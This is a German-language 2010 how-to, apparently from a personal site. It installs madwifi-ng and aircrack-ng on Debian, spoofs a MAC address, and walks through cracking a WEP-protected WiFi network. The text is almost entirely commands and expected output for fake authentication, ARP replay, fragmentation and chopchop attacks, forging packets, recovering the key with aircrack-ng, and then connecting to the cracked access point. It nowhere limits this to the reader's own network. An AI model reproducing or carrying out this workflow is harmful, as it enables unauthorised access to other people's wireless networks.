MADWIFI-NG UND AIRCRACK-NG BENUTZUNGS UND INSTALL FAQ AUF DEBIAN
MADWIFI-NG UND AIRCRACK-NG BENUTZUNGS UND INSTALL FAQ AUF DEBIAN (Stand 11.05.2010) [ © Oliver Schuetz aka OppTupacShakur | http://OPPServer.net | http://unix.oppserver.net ]
INSTALL UND CONFIG MADWIFI-NG
Als root anmelden: sudo -s oder nur su -
aptitude install patch ifconfig ath0 down ifconfig wifi0 down cd /usr/local/src svn -r 4129 checkout http://svn.madwifi-project.org/madwifi/trunk/ madwifi-ng wget http://patches.aircrack-ng.org/madwifi-ng-r4073.patch cd madwifi-ng patch -Np1 -i ../madwifi-ng-r4073.patch ./scripts/madwifi-unload make make install depmod -ae modprobe ath_pci
INSTALL UND CONFIG AIRCRACK-NG
aptitude install build-essential subversion subversion-tools cd /usr/local/src svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng cd aircrack-ng make make install
MONITORMODE EINSCHALTEN UND MAC ADRESSE AENDERN (FAKE MAC)
aptitude install macchanger
macchanger -s wifi0
Hier nun die Current MAC: merken, um sie spaeter evtl. wieder auf den Original Wert zurueckzusetzen
macchanger -s wifi0 > /root/wifi0_original_mac
So kann man sie auch einfach nach /root/wifi0_original_mac speichern.
wlanconfig ath0 destroy ifconfig wifi0 down macchanger --mac=00:11:22:33:44:55 wifi0
Hiermit wurde nun die FAKE MAC 00:11:22:33:44:55 auf wifi0 gesetzt.
ifconfig wifi0 up wlanconfig ath0 create wlandev wifi0 wlanmode monitor ifconfig ath0 up
Nun schauen wir uns die neue FAKEMAC von ath0 an:
macchanger -s ath0 Current MAC: 06:11:22:33:44:55 (unknown)
Das ist unsere FAKEMAC im folgenden Teil.
- WEP ####
AIRCRACK-NG, AIRODUMP-NG UND AIRREPLAY-NG ANLEITUNG
Injection testen:
aireplay-ng -B -9 ath0
airodump-ng ath0
Mit strg-c einmal stoppen und sich die MAC Adresse (BSSID), den Channel (CH) und den Namen (ESSID) des WLan Routers merken.
airodump-ng -w /pfad/wohin/ivsout -c CH -d BSSID ath0
Falls man nun hier schon einen verbunden Client sieht, kann man mit Methode 1 weiter machen, ohne Client nur mit Methode 2 oder 3.
Nun einen weiteren root Terminal oeffnen:
cd /pfad/wohin/ aireplay-ng -1 0 -e ESSID -a BSSID -h FAKEMAC ath0
Dies sollte dann dabei herauskommen:
Sending Authentication Request Authentication successful Sending Association Request Association successful :-)
METHODE 1
aireplay-ng -3 -b BSSID -h FAKEMAC ath0
Nun kann man im ersten root Terminal sehen das bei dem AP die Data Anzahl ziemlich schnell steig.
METHODE 2
aireplay-ng -5 -b BSSID -h FAKEMAC ath0
Warten bis ein Paket empfangen wurde und dann mit y > ENTER bestaetigen. Dann sollte folgende Meldung erscheinen:
Saving keystream in fragment-xxxx-xxxxxx.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Falls dann auch durch mehrmaliges y > ENTER immer wieder ein Still nothing, trying another packet... erscheint mit STRG+C abbrechen und eine weitere Methode testen.
METHODE 3
aireplay-ng -4 -b BSSID -h FAKEMAC ath0
Warten bist ein Paket empfangen wurde und dann mit y > ENTER bestaetigen. Durchlaufen lassen bis 100%, dann sollte folgende Meldung erscheinen:
Saving plaintext in replay_xxx-xxxx-xxxxxx.cap Saving keystream in replay_xxx-xxxx-xxxxxx.xor Completed in xxxs (xxx bytes/s)
NUR METHODE 2+3
Nun das empfangene in ein ARP Paket umwandeln:
packetforge-ng -0 -a BSSID -h FAKEMAC -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w arp-paket
oder halt
packetforge-ng -0 -a BSSID -h FAKEMAC -k 255.255.255.255 -l 255.255.255.255.255 -y replay_xxx-xxxx-xxxxxx.xor -w arp-paket
Darauf sollte folgende Ausgabe erscheinen:
Wrote packet to: arp-paket
aireplay-ng -2 -r arp-paket ath0
mit y > ENTER bestaetigen
Nun kann man im ersten root Terminal sehen das bei dem AP die Data Anzahl ziemlich schnell steig.
METHODE 1+2+3
Nun oeffnen wir den 3 root Terminal:
aircrack-ng -z -b BSSID ivsout*.cap
Dann sollte folgendes nach kurz oder lang erscheinen:
KEY FOUND! [ xx:xx:xx:xx:xx ] (ASCII: AT.HA ) Decrypted correctly: 100%
Nun koennen wir erstmal aireplay und airodump in den ersten 2 root Terminals mit STRG+C beenden und loggen uns wie folgt auf dem AP an:
wlanconfig ath0 destroy wlanconfig ath0 create wlandev wifi0 wlanmode managed ifconfig ath0 down iwconfig ath0 essid ESSID channel CH key xx:xx:xx:xx:xx ifconfig ath0 up aptitude install dhcpcd dhcpcd ath0
Dabei sollte nun folgendes erscheinen:
interface ath0 has been configured with new IP=xxx.xxx.xxx.xxx
HF ;)